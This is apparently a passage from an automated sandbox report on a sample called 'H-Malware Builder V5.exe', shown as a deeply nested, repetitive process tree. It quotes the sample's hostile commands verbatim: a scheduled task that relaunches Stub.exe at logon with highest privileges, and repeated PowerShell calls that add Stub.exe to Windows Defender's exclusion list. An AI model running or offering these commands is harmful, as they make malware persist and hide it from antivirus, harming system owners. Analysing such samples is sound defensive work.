        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3940
  - - C:\Windows\SYSTEM32\SCHTASKS.exe
      "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:5036
  - - C:\Windows\SYSTEM32\SCHTASKS.exe
      "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4860
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3008
- - C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
    "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
    3⤵
    - Checks computer location settings
    - Drops startup file
    PID:2884
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4232
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        Suspicious use of SetWindowsHookEx
        
        PID:4580
  - - C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
      "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
      4⤵
      Checks computer location settings
      Drops startup file
      PID:3788
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:4104
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        Suspicious use of SetWindowsHookEx
        
        PID:3804
    - - C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        5⤵
        Checks computer location settings
        Drops startup file
        
        PID:4732
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1180
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        Suspicious use of SetWindowsHookEx
        
        PID:3496
      - C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        6⤵
        Checks computer location settings
        Drops startup file
        
        PID:2240
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5076
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        Suspicious use of SetWindowsHookEx
        
        PID:4952
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        7⤵
        Checks computer location settings
        Drops startup file
        
        PID:428
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3212
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        9⤵
        Suspicious use of SetWindowsHookEx
        
        PID:3144
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        8⤵
        Checks computer location settings
        
        PID:2096
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2956
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        Suspicious use of SetWindowsHookEx
        
        PID:4752
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        9⤵
        Checks computer location settings
        Drops startup file
        
        PID:4532
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2040
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        10⤵
        Checks computer location settings
        Drops startup file
        
        PID:3708
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3588
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        12⤵
        Suspicious use of SetWindowsHookEx
        
        PID:880
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        11⤵
        Checks computer location settings
        Drops startup file
        
        PID:2652
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3252
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        13⤵
        Suspicious use of SetWindowsHookEx
        
        PID:3372
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        12⤵
        Checks computer location settings
        Drops startup file
        
        PID:1164
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        13⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1128
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        14⤵
        Suspicious use of SetWindowsHookEx
        
        PID:4764
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        13⤵
        Checks computer location settings
        Drops startup file
        
        PID:3356
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        14⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1380
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        14⤵
        Checks computer location settings
        Drops startup file
        
        PID:4444
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        15⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1764
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        16⤵
        Suspicious use of SetWindowsHookEx
        
        PID:2408
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        15⤵
        Checks computer location settings
        Drops startup file
        
        PID:5104
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        16⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4540
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        17⤵
        Suspicious use of SetWindowsHookEx
        
        PID:2332
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        16⤵
        Checks computer location settings
        Drops startup file
        
        PID:3612
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        17⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2004
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        18⤵
        Suspicious use of SetWindowsHookEx
        
        PID:1880
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        17⤵
        Checks computer location settings
        Drops startup file
        
        PID:3272
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        18⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1820
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        19⤵
        Suspicious use of SetWindowsHookEx
        
        PID:3500
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        18⤵
        Checks computer location settings
        Drops startup file
        
        PID:3436
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        19⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1964
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        20⤵
        
        PID:3032
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        19⤵
        Checks computer location settings
        Drops startup file
        
        PID:4656
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        20⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3772
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        20⤵
        Checks computer location settings
        Drops startup file
        
        PID:4772
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        21⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:468
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        22⤵
        Suspicious use of SetWindowsHookEx
        
        PID:2660
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        21⤵
        Checks computer location settings
        Drops startup file
        
        PID:5104
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        22⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2916
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        23⤵
        Suspicious use of SetWindowsHookEx
        
        PID:1968
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        22⤵
        Checks computer location settings
        Drops startup file
        
        PID:1128
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        23⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2656
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        24⤵
        Suspicious use of SetWindowsHookEx
        
        PID:4444
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        23⤵
        Checks computer location settings
        Drops startup file
        
        PID:1764
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        24⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1424
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        25⤵
        
        PID:4540
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        24⤵
        Checks computer location settings
        Drops startup file
        
        PID:4288
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        25⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2320
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        26⤵
        Suspicious use of SetWindowsHookEx
        
        PID:4356
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        25⤵
        Checks computer location settings
        Drops startup file
        
        PID:3144
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        26⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4448
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        27⤵
        Suspicious use of SetWindowsHookEx
        
        PID:3996
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        26⤵
        Checks computer location settings
        Drops startup file
        
        PID:3760
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        27⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1048
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        28⤵
        Suspicious use of SetWindowsHookEx
        
        PID:2724
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        27⤵
        Checks computer location settings
        Drops startup file
        
        PID:2572
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        28⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4932
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        29⤵
        
        PID:1932
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        28⤵
        Checks computer location settings
        Drops startup file
        
        PID:2004
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        29⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:456
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        30⤵
        
        PID:4448
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        29⤵
        Checks computer location settings
        Drops startup file
        
        PID:2928
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        30⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5104
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        31⤵
        Suspicious use of SetWindowsHookEx
        
        PID:3252
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        30⤵
        Checks computer location settings
        Drops startup file
        
        PID:1380
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        31⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:212
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        32⤵
        
        PID:968
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        31⤵
        Checks computer location settings
        Drops startup file
        
        PID:2780
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        32⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1488
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        33⤵
        
        PID:5052
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        32⤵
        Checks computer location settings
        Drops startup file
        
        PID:2232
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        33⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4520
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        34⤵
        Suspicious use of SetWindowsHookEx
        
        PID:348
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        33⤵
        Checks computer location settings
        Drops startup file
        
        PID:1128
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        34⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1196
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        35⤵
        Suspicious use of SetWindowsHookEx
        
        PID:1928
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        34⤵
        Checks computer location settings
        Drops startup file
        
        PID:5024
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        35⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4848
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        36⤵
        Suspicious use of SetWindowsHookEx
        
        PID:4436
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        35⤵
        Checks computer location settings
        Drops startup file
        
        PID:2972
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        36⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3200
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        37⤵
        Suspicious use of SetWindowsHookEx
        
        PID:5100
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        36⤵
        Checks computer location settings
        Drops startup file
        
        PID:2912
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        37⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4420
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        38⤵
        Suspicious use of SetWindowsHookEx
        
        PID:2188
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        37⤵
        Checks computer location settings
        Drops startup file
        
        PID:3824
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        38⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:612
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        39⤵
        Suspicious use of SetWindowsHookEx
        
        PID:4380
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        38⤵
        Checks computer location settings
        Drops startup file
        
        PID:4240
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        39⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4036
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        39⤵
        Checks computer location settings
        Drops startup file
        
        PID:4664
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        40⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4512
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        41⤵
        Suspicious use of SetWindowsHookEx
        
        PID:3708
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        40⤵
        Checks computer location settings
        Drops startup file
        
        PID:1992
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        41⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2836
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        42⤵
        Suspicious use of SetWindowsHookEx
        
        PID:3532
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        41⤵
        Checks computer location settings
        Drops startup file
        
        PID:4708
        
